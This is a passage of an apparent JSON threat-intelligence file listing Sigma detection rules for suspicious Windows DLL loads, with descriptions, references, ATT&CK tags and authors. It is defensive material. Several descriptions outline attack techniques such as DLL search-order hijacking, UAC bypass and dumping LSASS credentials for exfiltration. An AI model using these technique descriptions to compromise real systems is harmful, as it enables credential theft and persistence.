"https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/14", + "filename": "image_load_side_load_from_non_system_location.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", + "level": "medium", + "falsepositive": [ + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "value": "Microsoft Office DLL Sideload", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_office_dlls.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", + "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", + "value": "SCM DLL Sideload", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": "image_load_side_load_scm.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", + "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "value": "Third Party Software DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_third_party.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", + "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", + "value": "VMGuestLib DLL Sideload", + "meta": { + "refs": [ + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/12/01", + "filename": "image_load_side_load_vmguestlib.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "FP could occure if the legitimate version of vmGuestLib already exists on the system" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL sideloading of DLLs that are part of web browsers", + "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "value": "Web Browsers DLL Sideloading", + "meta": { + "refs": [ + "https://hijacklibs.net/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2022/08/17", + "filename": "image_load_side_load_web_browsers.yml", + "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects SILENTTRINITY stager use", + "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "value": "SILENTTRINITY Stager Execution - DLL", + "meta": { + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1071" + ], + "creation_date": "2019/10/22", + "filename": "image_load_silenttrinity_stage_use.yml", + "author": "Aleksey Potapov, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detect DLL Load from Spooler Service backup folder", + "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", + "value": "Windows Spooler Service Suspicious Binary Load", + "meta": { + "refs": [ + "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675", + "cve.2021.34527" + ], + "creation_date": "2021/06/29", + "filename": "image_load_spoolsv_dll_load.yml", + "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "level": "informational", + "falsepositive": [ + "Loading of legitimate driver" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", + "value": "Suspicious Load of Advapi31.dll", + "meta": { + "refs": [ + "https://github.com/hlldz/Phant0m", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/02/03", + "filename": "image_load_susp_advapi32_dll.yml", + "author": "frack113", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "uuid": "75e508f7-932d-4ebc-af77-269237a84ce1", + "value": "Cmstp Suspicious DLL Load", + "meta": { + "refs": [ + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.003" + ], + "creation_date": "2022/08/30", + "filename": "image_load_susp_cmstp.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", + "value": "Load of dbghelp/dbgcore DLL from Suspicious Process", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", + "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", + "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/27", + "filename": "image_load_susp_dbghelp_dbgcore_load.yml", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "value": "DLL Load By System Process From Suspicious Locations", + "meta": { + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], + "creation_date": "2022/07/17", + "filename": "image_load_susp_dll_load_system_process.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "value": "Fax Service DLL Search Order Hijack", + "meta": { + "refs": [ + "https://windows-internals.com/faxing-your-way-to-system/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" + ], + "creation_date": "2020/05/04", + "filename": "image_load_susp_fax_dll.yml", + "author": "NVISO", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects any assembly DLL being loaded by an Office Product", + "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", + "value": "dotNET DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects CLR DLL being loaded by an Office Product", + "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "value": "CLR DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects any GAC DLL being loaded by an Office Product", + "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", + "value": "GAC DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DSParse DLL being loaded by an Office Product", + "uuid": "a2a3b925-7bb0-433b-b508-db9003263cc4", + "value": "Active Directory Parsing DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_dsparse_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects Kerberos DLL being loaded by an Office Product", + "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "value": "Active Directory Kerberos DLL Loaded Via Office Applications", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_office_kerberos_dll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", + "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "value": "Python Py2Exe Image Load", + "meta": { + "refs": [ + "https://www.py2exe.org/", + "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.002" + ], + "creation_date": "2020/05/03", + "filename": "image_load_susp_python_image_load.yml", + "author": "Patrick St. John, OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Legitimate Py2Exe Binaries", + "Known false positive caused with Python Anaconda" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects CLR DLL being loaded by an scripting applications", + "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", + "value": "CLR DLL Loaded Via Scripting Applications", + "meta": { + "refs": [ + "https://github.com/tyranid/DotNetToJScript", + "https://thewover.github.io/Introducing-Donut/", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2020/10/14", + "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", + "author": "omkar72, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for processes loading System.Drawing.ni.dll. This could be an indicator of potential Screen Capture.", + "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", + "value": "Suspicious System.Drawing Load", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2020/05/02", + "filename": "image_load_susp_system_drawing_load.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", + "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "value": "Possible Process Hollowing Image Loading", + "meta": { + "refs": [ + "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2018/01/07", + "filename": "image_load_susp_uncommon_image_load.yml", + "author": "Markus Neis", + "level": "high", + "falsepositive": [ + "Very likely, needs more tuning" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of VSS DLL by uncommon executables", + "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", + "value": "Image Load of VSS Dll by Uncommon Executable", + "meta": { + "refs": [ + "https://github.com/ORCx41/DeleteShadowCopies", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2022/10/31", + "filename": "image_load_susp_vss_dll_load.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the image load of vss_ps.dll by uncommon executables", + "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "value": "Image Load of VSS_PS.dll by Uncommon Executable", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.impact", + "attack.t1490" + ], + "creation_date": "2021/07/07", + "filename": "image_load_susp_vss_ps_load.yml", + "author": "Markus Neis, @markus_neis", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects DLL's Loaded Via Word Containing VBA Macros", + "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "value": "VBA DLL Loaded Via Microsoft Word", + "meta": { + "refs": [ + "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/02/19", + "filename": "image_load_susp_winword_vbadll_load.yml", + "author": "Antonlovesdnb", + "level": "high", + "falsepositive": [ + "Alerts on legitimate macro usage as well, will need to filter as appropriate" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", + "uuid": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "value": "Svchost DLL Search Order Hijack", + "meta": { + "refs": [ + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1574.001" + ], + "creation_date": "2019/10/28", + "filename": "image_load_svchost_dll_search_order_hijack.yml", + "author": "SBousseaden", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", + "uuid": "49329257-089d-46e6-af37-4afce4290685", + "value": "SharpEvtMute Imphash EvtMuteHook Load", + "meta": { + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "creation_date": "2022/09/07", + "filename": "image_load_sysmon_disable_sharpevtmute.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Other DLLs with that import hash" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", + "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", + "value": "Time Travel Debugging Utility Usage - Image", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", + "https://twitter.com/mattifestation/status/1196390321783025666", + "https://twitter.com/oulusoyum/status/1191329746069655553", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.credential_access", + "attack.t1218", + "attack.t1003.001" + ], + "creation_date": "2020/10/06", + "filename": "image_load_tttracer_mod_load.yml", + "author": "Ensar \u015eamil, @sblmsrsn, @oscd_initiative", + "level": "high", + "falsepositive": [ + "Legitimate usage by software developers/testers" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", + "value": "UAC Bypass Using Iscsicpl - ImageLoad", + "meta": { + "refs": [ + "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", + "https://twitter.com/wdormann/status/1547583317410607110", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], + "creation_date": "2022/07/17", + "filename": "image_load_uac_bypass_iscsicpl.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Attempts to load dismcore.dll after dropping it", + "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", + "value": "UAC Bypass With Fake DLL", + "meta": { + "refs": [ + "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" + ], + "creation_date": "2020/10/06", + "filename": "image_load_uac_bypass_via_dism.yml", + "author": "oscd.community, Dmitry Uchakin", + "level": "high", + "falsepositive": [ + "Actions of a legitimate telnet client" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", + "uuid": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "value": "UIPromptForCredentials DLLs", + "meta": { + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", + "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ], + "creation_date": "2020/10/20", + "filename": "image_load_uipromptforcreds_dlls.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "Other legitimate processes loading those DLLs in your environment." + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Loading unsigned image (DLL, EXE) into LSASS process", + "uuid": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "value": "Unsigned Image Loaded Into LSASS Process", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_unsigned_image_loaded_into_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2019/10/22", + "filename": "image_load_unsigned_image_loaded_into_lsass.yml", + "author": "Teymur Kheirkhabarov, oscd.community", + "level": "medium", + "falsepositive": [ + "Valid user connecting using RDP" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", + "uuid": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "value": "APT PRIVATELOG Image Load Pattern", + "meta": { + "refs": [ + "https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ], + "creation_date": "2021/09/07", + "filename": "image_load_usp_svchost_clfsw32.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Rarely observed" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", + "uuid": "9313dc13-d04c-46d8-af4a-a930cc55d93b", + "value": "VMware Xfer Loading DLL from Nondefault Path", + "meta": { + "refs": [ + "https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2022/08/02", + "filename": "image_load_vmware_xfer_load_dll_from_nondefault_path.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", + "uuid": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", + "value": "WMIC Loading Scripting Libraries", + "meta": { + "refs": [ + "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", + "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ], + "creation_date": "2020/10/17", + "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "medium", + "falsepositive": [ + "The command wmic os get lastboottuptime loads vbscript.dll", + "The command wmic os get locale loads vbscript.dll", + "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", + "uuid": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "value": "Wmiprvse Wbemcomn DLL Hijack", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-201009173318.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmiprvse_wbemcomn_dll_hijack.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.002" + ], + "creation_date": "2020/10/12", + "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects non wmiprvse loading WMI modules", + "uuid": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "value": "WMI Modules Loaded", + "meta": { + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190811201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmi_module_load.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ], + "creation_date": "2019/08/10", + "filename": "image_load_wmi_module_load.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "level": "informational", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "image_load", + "logsource.product": "windows" + } + }, + { + "description": "Detects WMI command line event consumers", + "uuid": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", 